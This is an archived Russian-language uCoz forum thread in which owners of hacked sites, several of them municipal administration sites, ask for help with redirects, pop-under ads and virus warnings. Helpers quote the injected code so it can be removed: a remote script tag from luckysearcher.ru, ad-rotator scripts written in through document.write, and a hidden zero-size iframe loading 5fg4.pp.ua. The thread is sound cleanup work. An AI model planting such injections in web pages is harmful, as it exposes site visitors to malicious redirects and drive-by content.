Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах_3 (архив для чтения) |
| Вирусы на сайтах_3 (архив для чтения) |
|
Неделю назад на всех моих официальных сайтах муниципальных образований в системе ЮКОЗ был изменён шаблон в глобальных блоках. Происходила переадресация на сайт http://battle-soft.ru/
Сотрудники ЮКОЗ своими профессиональными советами помогли мне почистить код и удалить лишний и вредный.Большое им спасибо. Сейчас на сайтах моего аккаунта размещена несанкционированная реклама типа попандер часто порнографического содержания. Проверил компьютер на вирусы . Сменил все пароли от сайта :uNet-пароль, пароль от панели управления, пароль от учётной записи на сайте. Перевел сайты на другие аккаунты. Никагого эффекта В сужбе поддержки мне посоветовали убрать вот такой код <script language='javascript' type='text/javascript' src='http://luckysearcher.ru/7uzkku3gefx7bl7bl05teczw9fgidzp'></script> он с небольшими ньюансами на всех сайтах http://admbikovo.ru http://primorskadmin.ru http://adminpobeda.ucoz.ru/ http://admsoldatstep.ru http://admkrasnoselec.ru/ http://lugproleyka-adm.ucoz.ru/ http://kislovoadmin.ucoz.ru/ http://tosprimorskoe.ru помогите мне найти этот код и удалить я уже восстанавливал стандартные шаблоны, поломал весь дизайн и ни какого толка... пожалуйста!!!! С уважением, Владимир |
|
vladimir50, воспользуйтесь быстрой заменой:
В поле "Что заменить": <script language='javascript' type='text/javascript' src='http://luckysearcher.ru/7uzkku3gefx7bl7bl05teczw9fgidzp'></script> Поле "На что заменить" оставляем пустым, жмем ок. Кроме того, после этого желательно проверить все шаблоны вручную на наличие подобного кода. |
|
Спасибо bandjuk и Drinko! за советы и помощь!!!!
|
|
Rromichh, удалите со всех страниц код счетчика тиц и пр
Code <script type="text/javascript" src="http://upols.ru/cod.php?url=infotreker.ru&id=69"></script> в содержимом есть вставка сторонней рекламы как раз с различными всплывающими окнами Quote document.write(unescape('<script language="javascript" src="http://uno.wt-rotator115.ru/?t=br&noadult=1&pid=58732"></script><script language="javascript" src="http://uno.wt-rotator.biz/?t=rot&noadult=1&pid=58732"></script><a href="http://upols.ru/" target="_blank" ><img src="http://upols.ru/codes.php?id=69&url=infotreker.ru" title="Счетчик тИЦ и PR" alt="Счетчик тИЦ и PR"></a>')); выделенное красным и есть код вызова сторонней рекламы |
|
МУРЗИЛКИН, удалите все что связано с уралпортом
перелейте скрипт на сайт. не подгружайтес чужого Quote <script src="http://apocalypse.ucoz.kz/js/jquery.tooltip.js" type="text/javascript"></script> <script src="http://apocalypse.ucoz.kz/js/opacity.js"></script> второй битый |
|
МУРЗИЛКИН,
 Видимо проблема в фавиконе Прикрепления:
0918316.png
(9.2 Kb)
.::I'll be back::.
Выбор за тобой! Сообщение отредактировал FeniX_kz - Среда, 08 Авг 2012, 18:19:56
|
|
FeniX_kz,
Quote Видио проблема в фавиконе если после удаления иконки проблема исчезнет - то это проблемы нода |
|
МУРЗИЛКИН, это системная папка модуля каталог файлов. Загруженные файлы имеют такой формат адреса:
/_ld/0/10_*.* (например), где 10 - это ID материала Определяйте ID проблемного материала и ищите его через ПУ - каталог файлов - управление материалами. Сообщение отредактировал Астра - Четверг, 09 Авг 2012, 13:36:19
|
|
1. http://cstrike-extr1m.clan.su/
2. Как гость выдаёт вирус и убирает 2блок сайта, когда заходишь как пользователь 2 блок сайта остаётся и просто выдаёт вирус. 3. Когда заходишь как гость http://s61.radikal.ru/i172/1208/b3/459a9af261df.jpg . Когда заходишь как пользователь http://s58.radikal.ru/i160/1208/cb/5377edbdc679.jpg 4. Браузером сайт не блокируется. |
|
=)VlaD=), из опросов выделенное красным удалить
Quote <input type="hidden" name="a" value="1" /><input type="hidden" name="ajax" value="037" /></div> <div style="padding-top:4px;text-align:center;"><iframe src="http://5fg4.pp.ua" width="0" height="0" style="display:none"></iframe><img alt="javascript://" rel="nofollow" onclick="new _uWnd('PollR','Результаты опроса',660,200,{closeonesc:1,maxh:400},{url:'http://cstrike-extr1m.clan.su/poll/1'});return false;" src="http://i065.radikal.ru/1007/1a/bcf8b653350d.png"> <img alt="javascript://" rel="nofollow" onclick="new _uWnd('PollA','Архив опросов',660,250,{closeonesc:1,maxh:400,max:1,min:1},{url:'http://cstrike-extr1m.clan.su/poll/0-2'});return false;" src="http://s41.radikal.ru/i094/1007/8c/088815426aa2.png"></div> <script type="text/javascript"> |
|
Quote (webanet) =)VlaD=), из опросов выделенное красным удалить Quote <input type="hidden" name="a" value="1" /><input type="hidden" name="ajax" value="037" /></div> <div style="padding-top:4px;text-align:center;"><iframe src="http://5fg4.pp.ua" width="0" height="0" style="display:none"></iframe><img alt="javascript://" rel="nofollow" onclick="new _uWnd('PollR','Результаты опроса',660,200,{closeonesc:1,maxh:400},{url:'http://cstrike-extr1m.clan.su/poll/1'});return false;" src="http://i065.radikal.ru/1007/1a/bcf8b653350d.png"> <img alt="javascript://" rel="nofollow" onclick="new _uWnd('PollA','Архив опросов',660,250,{closeonesc:1,maxh:400,max:1,min:1},{url:'http://cstrike-extr1m.clan.su/poll/0-2'});return false;" src="http://s41.radikal.ru/i094/1007/8c/088815426aa2.png"></div> <script type="text/javascript"> IE это такая программа, с помощью которой можно зайти на сайт www.mozilla,com и скачать себе браузер... http://webanet.ucoz.ru/ Спасибо |
| |||